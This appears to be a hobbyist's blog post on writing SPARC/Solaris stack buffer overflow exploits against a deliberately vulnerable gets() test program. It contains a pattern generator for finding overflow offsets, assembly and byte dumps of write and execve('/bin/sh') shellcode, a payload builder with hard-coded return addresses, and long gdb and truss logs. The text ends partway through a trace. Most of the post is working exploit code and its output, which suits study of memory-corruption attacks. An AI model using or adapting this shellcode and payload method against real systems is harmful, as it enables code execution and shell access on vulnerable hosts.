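#ifdef __sun
#include <sys/inttypes.h>
#else
#include <stdint.h>
#endif

/*
 * alternating_payload3: buffer-pattern generator and offset decoder.
 *
 *   ./alternating_payload3 NUMBYTES      write NUMBYTES pattern bytes to stdout
 *   ./alternating_payload3 0xXXYYYYYY    print the entry index of that 4-byte
 *                                        value inside the pattern
 *
 * The pattern is a run of 4-byte entries of the form
 * 0x[01-ff][41-5a][41-5a][41-5a]: the letter byte cycles 'A'..'Z', the lead
 * byte is bumped every 26 entries and never takes the value 0. Any aligned
 * word read back from a smashed frame therefore identifies its position in
 * the buffer. The caller appends whatever data it wants after the block, plus
 * the terminating null byte (or "\n", as the text above notes).
 */

/* 26 letters: 'Z'-'A' is 25, the range is inclusive so add 1. */
#define CHAR_RANGE (('Z'-'A')+1)
/* Arbitrary MAX derived as 26 letters * 255 non-zero lead bytes * 4 bytes per entry. */
#define MAX (CHAR_RANGE * 255 * 4)
/* Bytes emitted per lead-byte value: 26 entries of 4 bytes. */
#define RANGE (26*4)

/*
 * Map a smashed 4-byte value back to its entry index in the pattern:
 *   [(msb - 1) * 26] + (lsb - 0x41)
 * msb is the lead byte (1..255), lsb the letter byte ('A'..'Z'). The result
 * is the index of the 4-byte entry, not a byte offset (multiply by 4 for
 * bytes). All arithmetic is done in unsigned long: (msb - 1) * 26 exceeds 255
 * from lead byte 11 on and would wrap in an 8-bit temporary.
 * Values with msb == 0 or lsb < 0x41 are not pattern words; the caller filters
 * the former, the latter wraps.
 */
unsigned long getSmashOffset(const unsigned long *smashval)
{
    unsigned long msb = (*smashval >> 24) & 0xff;
    unsigned long lsb = *smashval & 0xff;

    return (msb - 1) * 26 + (lsb - 0x41);
}

int main(int argc, char **argv)
{
    unsigned char a;            /* letter byte, cycles 'A'..'Z' */
    unsigned char c;            /* lead byte, 1..255; skips 0 after wrapping */
    unsigned long i, rc = 0;    /* rc counts bytes since the lead byte last changed */
    unsigned long arg, numbytes;

    if (argc != 2) {
        printf ("You're doing it wrong! \n");
        printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);
        exit (1);
    }
    arg = numbytes = strtoul( argv[1], (void *)0, 0 );
    if (arg > MAX) {
        /* Anything larger than a pattern length is taken to be a smashed word. */
        if (arg < 0x01414141) {
            printf ("You can't have an overflow amount > %d\n", MAX);
            exit(2);
        }
        printf ("%lu\n", getSmashOffset(&arg));
        return 0;
    }

    /* Emit entries of [c][a][a][a]: a advances per entry, c every RANGE bytes. */
    for (a = 0x40, i = 0, c = 1; i < numbytes; i++) {
        if (i % 4 == 0) {
            printf("%c", c);
            a++;
            if (a == 'Z' + 1)
                a = 0x41;
        } else {
            printf("%c", a);
        }
        rc++;
        if (rc == RANGE) {
            rc = 0;
            c++;
            if (!c)
                c++;   /* never emit a 0x00 lead byte: it would terminate the string early */
        }
    }
    return 0;
}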
Check it out, here’s a stupid program that uses the write syscall to write some text “Hello” to stdout.
write_raw.S
bazz@blade72[pts/3][~/nobackup/fun] cat write_raw.S .globl main main: ! %o1 must point to the string! let's store the string on the stack set 0x48656c6c, %o0 !"Hell" st %o0, [%sp+84] set 0x6f0a0000, %o0 ! "o\n" st %o0, [%sp+88] add %sp, 84, %o1 mov 1, %o0 mov 7, %o2 mov 4, %g1 ta 8 ! addition to prevent illegal instruction failure mov 1, %g1 ! move 1(exit() syscall) into %g1 mov 0, %o0 ! move 0(return address) into %o0 ta 8 ! call the kernel bazz@blade72[pts/3][~/nobackup/fun] gcc write_raw.S -o /tmp/write_ex bazz@blade72[pts/3][~/nobackup/fun] /tmp/write_ex Hello bazz@blade72[pts/3][~/nobackup/fun
This gets transformed to shellcode like this:
bazz@blade72[pts/3][~/nobackup/fun/asmshell] declare -f buildsc buildsc () { if [ "$1" = "" ]; then echo 'buildsc filename no extension'; return 1; fi; as $1.S -o $1.o; objcopy -O binary $1.o $1.bin }
An alternative to objcopy, also sparcv9 how to:
bazz@vm72[pts/3][~/tools/tmp] cat asmtobin.sh as -Av9 $1.S -o $1.o ld $1.o -o $1.bin --oformat=binary bazz@vm72[pts/3][~/tools/tmp]
bazz@blade72[pts/3][~/nobackup/fun] buildsc write_raw bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw. write_raw.S write_raw.bin write_raw.o bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.bin 000000 1112195b 9012206c d023a054 111bc280 000010 d023a058 9203a054 90102001 94102007 000020 82102004 91d02008 82102001 90102000 000030 91d02008 000034
Then, to correctly put out a buffer, this knowledge comes from experimenting and debugging the target binary..
bazz@blade72[pts/1][~/tools/tmp/latest] cat build_shellcode_steps ./alternating_payload3 328 # payload size to arrive at %fp and %i7 # fp which becomes the $sp I use during our infected run. These vals # were obtained from live debugging and a better final adaptive method should be used # at production level. # orig val: ffbefe78 printf "\xff\xbe\xfd\x78" # return address: # original val: ffbefe78 printf "\xff\xbe\xfe\xf8" #printf "\xff\xbe\xfe\x38" >> payload # orig val: 0x40 # experimented displacing the payload farther "up" the stack perl -e 'print "A"x0xc0' cat $1 # payload bin file printf "\x00"
bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps write_raw.bin > payload bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) list 0 1 #include 2 unsigned long get_sp( void ) { 3 __asm__("or %sp,%sp,%r1"); 4 } 5 6 void copy( ){ 7 char buf[256]; 8 9 gets(buf); 10 } (gdb) 11 12 int main( ) { 13 unsigned long ret = get_sp(); 14 fprintf (stderr, "sp = 0x%x\n", ret); 15 copy( ); 16 return 0; 17 } (gdb) b 16 Breakpoint 1 at 0x10790: file v.c, line 16. (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Breakpoint 1, main () at v.c:16 16 return 0; (gdb) # overflow just happened (gdb) x/96x $sp # at this point, this current stack frame's %fp and %i7 are below and are the infected ones # that will be returned upon the next ret restore. # at the top of this printout is a continuation from my marker program, # you can see the pattern. The beginning of the buffer could be looked at by # going lower in memory ie. x/96x $sp-96 or farther down as well.. # but that's not necessary for us. this post is to show how the write syscalls # are about to be executed just fine, but later the execv # syscall just returns and I don't get a shell for some reason. 
0xffbefe00: 0x03515151 0x03525252 0x03535353 0x03545454 0xffbefe10: 0x03555555 0x03565656 0x03575757 0x03585858 0xffbefe20: 0x03595959 0x035a5a5a 0x04414141 0x04424242 0xffbefe30: 0x04434343 0x04444444 0xffbefd78 0xffbefef8 0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefec0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefed0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefee0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefef0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbeff00: 0x1112195b 0x9012206c 0xd023a054 0x111bc280 0xffbeff10: 0xd023a058 0x9203a054 0x90102001 0x94102007 0xffbeff20: 0x82102004 0x91d02008 0x82102001 0x90102000 0xffbeff30: 0x91d02008 0x00002000 0x000007d0 0x00001caf 0xffbeff40: 0x000007d1 0x00001caf 0x000007d2 0x00002801 0xffbeff50: 0x000007d3 0x00002801 0x000007d9 0x00000007 0xffbeff60: 0x00000000 0x00000000 0x2f6e6f62 0x61636b75 ---Type to continue, or q to quit--- 0xffbeff70: 0x702f626c 0x61646537 0x345f7364 0x30672f62 (gdb) si 17 } (gdb) 0x00010798 17 } (gdb) x/4i $pc 0x10798 <main+64>: ret 0x1079c <main+68>: restore 0x107a0 <main+72>: retl 0x107a4 <main+76>: add %o7, %l7, %l7 (gdb) si 0x0001079c 17 } (gdb) 0xffbeff00 in ?? () (gdb) x/16i $pc 0xffbeff00: sethi %hi(0x48656c00), %o0 0xffbeff04: or %o0, 0x6c, %o0 ! 
0x48656c6c 0xffbeff08: st %o0, [ %sp + 0x54 ] 0xffbeff0c: sethi %hi(0x6f0a0000), %o0 0xffbeff10: st %o0, [ %sp + 0x58 ] 0xffbeff14: add %sp, 0x54, %o1 0xffbeff18: mov 1, %o0 0xffbeff1c: mov 7, %o2 0xffbeff20: mov 4, %g1 0xffbeff24: ta 8 0xffbeff28: mov 1, %g1 0xffbeff2c: clr %o0 0xffbeff30: ta 8 0xffbeff34: unimp 0x2000 0xffbeff38: unimp 0x7d0 0xffbeff3c: unimp 0x1caf (gdb) si 0xffbeff04 in ?? () (gdb) 0xffbeff08 in ?? () (gdb) 0xffbeff0c in ?? () (gdb) 0xffbeff10 in ?? () (gdb) 0xffbeff14 in ?? () (gdb) 0xffbeff18 in ?? () (gdb) 0xffbeff1c in ?? () (gdb) 0xffbeff20 in ?? () (gdb) 0xffbeff24 in ?? () (gdb) Hello 0xffbeff28 in ?? () (gdb) 0xffbeff2c in ?? () (gdb) 0xffbeff30 in ?? () (gdb) Program exited normally. (gdb) del Delete all breakpoints? (y or n) y (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Hello Program exited normally. (gdb) q bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload sp = 0xffbefd90 Hello bazz@blade72[pts/1][~/tools/tmp/latest]
OK I clearly demonstrated how the write example buffer overflow hijacked just fine.
But now.. a shell spawn fails, and I don’t know why:
bazz@blade72[pts/3][~/nobackup/fun/asmshell] cat asmshell3.S .globl main main: set 0x2f62696e, %o0 st %o0, [%sp+84] set 0x2f736800, %o0 st %o0, [%sp+88] add %sp, 84, %o0 clr [%sp+92] st %o0, [%sp+76] clr [%sp+80] add %sp, 76, %o1 xor %o5,%o5,%o2 mov 0x3b, %g1 ta 8 !ta 8 ! addition to prevent illegal instruction failure xor %o5,%o5,%o0 !add %o1,%o1,%o0 ! interprets as end of string!! even without null byte ! and o1, 2, %o0 ! exit(0) mov 1, %g1 ta 8 bazz@blade72[pts/3][~/nobackup/fun/asmshell] buildsc asmshell3 bazz@blade72[pts/3][~/nobackup/fun/asmshell] od -X -A x asmshell3.bin 000000 110bd89a 9012216e d023a054 110bdcda 000010 d023a058 9003a054 c023a05c d023a04c 000020 c023a050 9203a04c 941b400d 8210203b 000030 91d02008 901b400d 82102001 91d02008 000040 bazz@blade72[pts/3][~/nobackup/fun/asmshell] cp asmshell3.bin ~/tools/tmp/latest bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps asmshell3.bin > payload bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) b 16 Breakpoint 1 at 0x10790: file v.c, line 16. 
(gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Breakpoint 1, main () at v.c:16 16 return 0; (gdb) x/96x $sp 0xffbefe00: 0x03515151 0x03525252 0x03535353 0x03545454 0xffbefe10: 0x03555555 0x03565656 0x03575757 0x03585858 0xffbefe20: 0x03595959 0x035a5a5a 0x04414141 0x04424242 0xffbefe30: 0x04434343 0x04444444 0xffbefd78 0xffbefef8 0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefec0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefed0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefee0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefef0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbeff00: 0x110bd89a 0x9012216e 0xd023a054 0x110bdcda 0xffbeff10: 0xd023a058 0x9003a054 0xc023a05c 0xd023a04c 0xffbeff20: 0xc023a050 0x9203a04c 0x941b400d 0x8210203b 0xffbeff30: 0x91d02008 0x901b400d 0x82102001 0x91d02008 0xffbeff40: 0x000007d1 0x00001caf 0x000007d2 0x00002801 0xffbeff50: 0x000007d3 0x00002801 0x000007d9 0x00000007 0xffbeff60: 0x00000000 0x00000000 0x2f6e6f62 0x61636b75 ---Type <return> to continue, or q <return> to quit--- 0xffbeff70: 0x702f626c 0x61646537 0x345f7364 0x30672f62 (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0xff3b3be0 in ?? () (gdb) c Continuing. Program exited normally. # NO SHELL!!! (gdb) q bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload sp = 0xffbefd90 bazz@blade72[pts/1][~/tools/tmp/latest] #NO SHELL!!! bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Program received signal SIGTRAP, Trace/breakpoint trap. 0xff3b3be0 in ?? () (gdb) x/16i $pc 0xff3b3be0: b,a 0xff3b3bec 0xff3b3be4: b,a 0xff3b3bf0 0xff3b3be8: b,a 0xff3b3bf4 0xff3b3bec: mov %g0, %o0 0xff3b3bf0: save %sp, -160, %sp 0xff3b3bf4: call 0xff3b3bfc 0xff3b3bf8: sethi %hi(0x2c800), %l7 0xff3b3bfc: or %l7, 0x3b4, %l7 ! 0x2cbb4 0xff3b3c00: addcc %i0, %g0, %o0 0xff3b3c04: bne 0xff3b3c60 0xff3b3c08: add %l7, %o7, %l7 0xff3b3c0c: add %sp, 0x60, %o0 0xff3b3c10: mov 3, %l0 0xff3b3c14: st %l0, [ %o0 ] 0xff3b3c18: add %fp, 0x44, %l0 0xff3b3c1c: st %l0, [ %o0 + 4 ] (gdb) q The program is running. Exit anyway? (y or n) y bazz@blade72[pts/1][~/tools/tmp/latest]
I seem to be in some trap handler.. Maybe the mysteries as to why it’s returning and not spawning a shell lie in there….
TO BE CONTINUED
… UPDATE!!!!
-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin -bash-4.3$ truss $PWD/invoke2 v < payload execve("/home/bazz/latest/invoke2", 0xFFBEFD3C, 0xFFBEFD4C) argc = 3 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/usr/lib/libcurses.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libcurses.so.1", "/usr/lib/libcurses.so.1", 1023) = 23 open("/usr/lib/libcurses.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x08F13AF8, 278528, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF340000 mmap(0xFF340000, 165416, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF340000 mmap(0xFF37A000, 28774, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 172032) = 0xFF37A000 mmap(0xFF382000, 6688, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF382000 munmap(0xFF36A000, 65536) = 0 memcntl(0xFF340000, 49420, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libsocket.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libsocket.so.1", "/usr/lib/libsocket.so.1", 1023) = 23 open("/usr/lib/libsocket.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x08F13EE0, 114688, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF320000 mmap(0xFF320000, 40558, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF320000 mmap(0xFF33A000, 4365, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 40960) = 0xFF33A000 munmap(0xFF32A000, 65536) = 0 memcntl(0xFF320000, 14496, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libnsl.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libnsl.so.1", "/usr/lib/libnsl.so.1", 1023) = 20 open("/usr/lib/libnsl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x08F142C8, 655360, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 
0xFF200000 mmap(0xFF200000, 582266, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF200000 mmap(0xFF290000, 33320, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 589824) = 0xFF290000 mmap(0xFF29A000, 23376, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF29A000 memcntl(0xFF200000, 84064, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x08F19CA0, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF310000 mmap(0xFF310000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF310000 mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF300000 close(3) = 0 stat("/usr/lib/libc.so.1", 0xFFBEF620) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x09899EB0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF100000 mmap(0xFF100000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF100000 mmap(0xFF1BC000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF1BC000 munmap(0xFF1AC000, 65536) = 0 memcntl(0xFF100000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libmp.so.2", 0xFFBEF620) = 0 resolvepath("/usr/lib/libmp.so.2", "/usr/lib/libmp.so.2", 1023) = 19 open("/usr/lib/libmp.so.2", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x09899AC8, 90112, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2E0000 mmap(0xFF2E0000, 11316, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2E0000 mmap(0xFF2F4000, 865, 
PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 16384) = 0xFF2F4000 munmap(0xFF2E4000, 65536) = 0 memcntl(0xFF2E0000, 3124, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF338) = 0 resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37 open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2D0000 mmap(0xFF2D0000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2D0000 close(3) = 0 munmap(0xFF390000, 8192) = 0 getcontext(0xFFBEFA88) open64("/dev/tty", O_RDWR|O_NONBLOCK) = 3 close(3) = 0 brk(0x0010A060) = 0 sysconfig(_CONFIG_PAGESIZE) = 8192 brk(0x0010A060) = 0 brk(0x0010C000) = 0 brk(0x0010E000) = 0 getuid() = 100 [100] getgid() = 10 [10] getuid() = 100 [100] getgid() = 10 [10] getcontext(0xFFBEFA88) time() = 1413348374 brk(0x00110000) = 0 brk(0x00112000) = 0 sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0 sigprocmask(SIG_BLOCK, 0x00000000, 0x0010A020) = 0 sigfillset(0xFF1C28D0) = 0 sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0 uname(0xFFBEF5D8) = 1 stat64("/home/bazz/latest", 0xFFBEF928) = 0 stat64(".", 0xFFBEF890) = 0 getpid() = 2098 [2097] getpid() = 2098 [2097] getpid() = 2098 [2097] getpgrp() = 2097 sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0 sysconfig(_CONFIG_CHILD_MAX) = 7893 getcontext(0xFFBEFA88) open64("/home/bazz/latest/invoke2", O_RDONLY) = 3 ioctl(3, TCGETA, 0xFFBEFAE4) Err#25 ENOTTY llseek(3, 0, SEEK_CUR) = 0 read(3, " # ! 
/ b i n / b a s h\n".., 80) = 80 llseek(3, 0, SEEK_SET) = 0 getrlimit(RLIMIT_NOFILE, 0xFFBEFA78) = 0 fcntl(255, F_GETFD, 0xFFBEFAE4) Err#9 EBADF fcntl(3, F_DUP2FD, 0x000000FF) = 255 close(3) = 0 fcntl(255, F_SETFD, 0x00000001) = 0 fcntl(255, F_GETFL, 0x00000000) = 8192 fstat64(255, 0xFFBEFAD8) = 0 fstat64(255, 0xFFBEFB30) = 0 llseek(255, 0, SEEK_CUR) = 0 getcontext(0xFFBEFA08) read(255, " # ! / b i n / b a s h\n".., 718) = 718 getcontext(0xFFBEFA08) getcontext(0xFFBEFA08) brk(0x00114000) = 0 getcontext(0xFFBEF390) getcontext(0xFFBEFA08) getcontext(0xFFBEFA08) sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF6B8) = 0 getcontext(0xFFBEF488) brk(0x00116000) = 0 pipe() = 3 [4] sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF67C, 0xFFBEF66C) = 0 llseek(255, 0xFFFFFFFFFFFFFE63, SEEK_CUR) = 305 fork() = 2099 sigprocmask(SIG_SETMASK, 0xFFBEF66C, 0x00000000) = 0 Received signal #18, SIGCLD [caught] siginfo: SIGCLD CLD_EXITED pid=2099 status=0x0001 waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) = 0 waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD setcontext(0xFFBEF350) sigaction(SIGCLD, 0xFFBEF5D0, 0xFFBEF650) = 0 close(4) = 0 read(3, " 0\n", 128) = 2 read(3, 0xFFBEF710, 128) = 0 close(3) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670) = 0 sigaction(SIGINT, 0xFFBEF538, 0xFFBEF5B8) = 0 sigaction(SIGINT, 0xFFBEF4C8, 0xFFBEF548) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0 getcontext(0xFFBEFA08) read(255, " p r o g = $ ( / h o m e".., 718) = 413 sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF4D0) = 0 getcontext(0xFFBEF2A0) pipe() = 3 [4] sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF494, 0xFFBEF484) = 0 llseek(255, 0xFFFFFFFFFFFFFE89, SEEK_CUR) = 343 fork() = 2100 sigprocmask(SIG_SETMASK, 0xFFBEF484, 0x00000000) = 0 Received signal #18, SIGCLD [caught] siginfo: SIGCLD 
CLD_EXITED pid=2100 status=0x0000 waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) = 0 waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD setcontext(0xFFBEF168) sigaction(SIGCLD, 0xFFBEF3E8, 0xFFBEF468) = 0 close(4) = 0 read(3, " / h o m e / b a z z / l".., 128) = 20 read(3, 0xFFBEF528, 128) = 0 close(3) = 0 sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488) = 0 sigaction(SIGINT, 0xFFBEF350, 0xFFBEF3D0) = 0 sigaction(SIGINT, 0xFFBEF2E0, 0xFFBEF360) = 0 sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0 getcontext(0xFFBEFA08) read(255, " s h i f t\n i f [ -".., 718) = 375 getcontext(0xFFBEFA08) getcontext(0xFFBEF4E0) getcontext(0xFFBEF4E0) setcontext(0xFFBEF4E0) sigaction(SIGINT, 0xFFBEF5E0, 0xFFBEF660) = 0 sigaction(SIGQUIT, 0xFFBEF5E0, 0xFFBEF660) = 0 sigaction(SIGCLD, 0xFFBEF5E0, 0xFFBEF660) = 0 execve("/home/bazz/bin/env", 0x001132C8, 0x0010F908) argc = 5 resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT stat("/tools/gcc-3.4.2/lib/libc.so.1", 0xFFBEF638) Err#2 ENOENT stat("/usr/lib/libc.so.1", 0xFFBEF638) = 0 resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18 open("/usr/lib/libc.so.1", O_RDONLY) = 3 mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000 mmap(0x10B0A4E0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000 mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000 mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000 munmap(0xFF32C000, 65536) = 0 memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0 close(3) = 0 stat("/usr/lib/libdl.so.1", 0xFFBEF638) = 0 resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19 open("/usr/lib/libdl.so.1", O_RDONLY) = 3 mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000 mmap(0x1018CDC8, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, 
